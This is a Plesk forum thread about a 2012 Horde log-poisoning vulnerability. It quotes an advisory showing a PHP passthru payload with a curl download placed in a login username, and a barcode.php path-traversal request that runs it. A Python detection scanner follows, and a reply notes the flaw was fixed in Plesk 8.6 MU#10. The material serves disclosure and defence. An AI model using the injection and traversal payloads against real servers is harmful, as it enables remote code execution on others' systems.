
Plesk Exploit: Readable Logfile Vulnerability?

AlfredoC

New Pleskian
A Parallels Plesk vulnerability in Horde has been published on Aug. 11, 2012 at:

http://bot24.blogspot.it/2012/08/plesk-exploit-readable-logfile.html

There seems to be no patch or microupdate dealing with the new alleged problem in Plesk as of Aug. 23.

Something similar was reported much earlier at:

http://cxsecurity.com/issue/WLB-2011020052

but this exploit appears to be something new.

Can someone confirm this problem with the latest versions of Plesk 11 and/or whether Parallels is dealing with this issue?

Thanks

read below:

----- cut here ----------

" Last update: Tuesday, August 21, 2012

We recently noticed a high level of vulnerability scans looking for instances of Plesk and. We monitored this activity closely and discovered an exploit taking advantage of a readable Horde logfile.
Here is the anatomy of the exploit:
A bogus request is made to the Horde login page with the malicious code in the username. This generates a log entry like the following in /var/log/psa-horde/psa-horde.log:

Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN xx.xxx.x.xxx to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://google.com/ > /tmp/test.txt"); ?>@cip.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

A request is then made to the barcode.php page (which calls /usr/share/psa-horde/lib/Horde/Image.php) to execute the commands written to the Horde log:

xx.xxx.x.xxx - - [16/Feb/2012:21:47.16 -0600] "GET /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log HTTP/1.1" 200 170 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

If the exploit is successful the hacker then begins uploading malicious files to the server. These malicious files then send out bogus UDP data over port 7. (source: Rackspace)
If you are using Plesk make certain you are keeping your security patches up to date and consider limiting access to certain system resources by IP.

credit: Country IP Blocks"

--------- end cut ----------
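The two log entries quoted above are the detectable footprint of this technique: a FAILED LOGIN line in psa-horde.log whose username carries PHP tags, followed by a barcode.php request whose type parameter traverses to that log. The following scanner, added here as an example and not part of the original post or of Plesk, correlates the two; the sample lines are constructed (placeholder IPs, a harmless payload) and the log layouts are assumed to match those quoted above.

```python
import re

# Constructed sample lines modelled on the two entries quoted in the post.
# IPs are documentation addresses, the PHP payload is harmless.
HORDE_LOG = """\
Feb 16 21:47:11 HORDE [error] [imp] FAILED LOGIN 203.0.113.5 to localhost:143[imap/notls] as <?php passthru("id"); ?>@cip.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
Feb 16 21:48:02 HORDE [error] [imp] FAILED LOGIN 203.0.113.9 to localhost:143[imap/notls] as bob@example.test [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
"""
ACCESS_LOG = """\
203.0.113.5 - - [16/Feb/2012:21:47:16 -0600] "GET /horde/util/barcode.php?type=../../../../../../var/log/psa-horde/psa-horde.log HTTP/1.1" 200 170 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Feb/2012:21:50:00 -0600] "GET /horde/util/barcode.php?type=code128&text=abc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Horde IMP failed-login line: source IP and the username as logged.
FAILED_LOGIN_RE = re.compile(r"FAILED LOGIN (?P<ip>\S+) to \S+ as (?P<user>.*?) \[on line")
# A username is only ever a mail address; PHP open tags mean log poisoning.
PHP_TAG_RE = re.compile(r"<\?(php|=|\s)", re.IGNORECASE)
# Apache combined log: client IP, then the request line.
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
# Plain and URL-encoded "../" traversal sequences.
TRAVERSAL_RE = re.compile(r"(\.\./|%2e%2e%2f|%2e%2e/|\.\.%2f)", re.IGNORECASE)


def poisoned_login_entries(log_text):
    """Return (ip, username) for FAILED LOGIN entries whose username carries PHP tags."""
    hits = []
    for line in log_text.splitlines():
        m = FAILED_LOGIN_RE.search(line)
        if m and PHP_TAG_RE.search(m.group("user")):
            hits.append((m.group("ip"), m.group("user")))
    return hits


def traversal_requests(log_text, script="barcode.php"):
    """Return (ip, request path) for requests to `script` whose query traverses directories."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if m and script in m.group("path") and TRAVERSAL_RE.search(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits


def correlate(horde_log, access_log):
    """IPs seen both poisoning the Horde log and pulling it back through barcode.php."""
    poisoners = {ip for ip, _ in poisoned_login_entries(horde_log)}
    readers = {ip for ip, _ in traversal_requests(access_log)}
    return sorted(poisoners & readers)
```

Either half alone is worth an alert; a source IP in both lists is the full chain and warrants checking /tmp and the web root for dropped files.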
 
It is actual only for the Plesk 8.6 version. Fixed in Plesk 8.6 MU#10.
 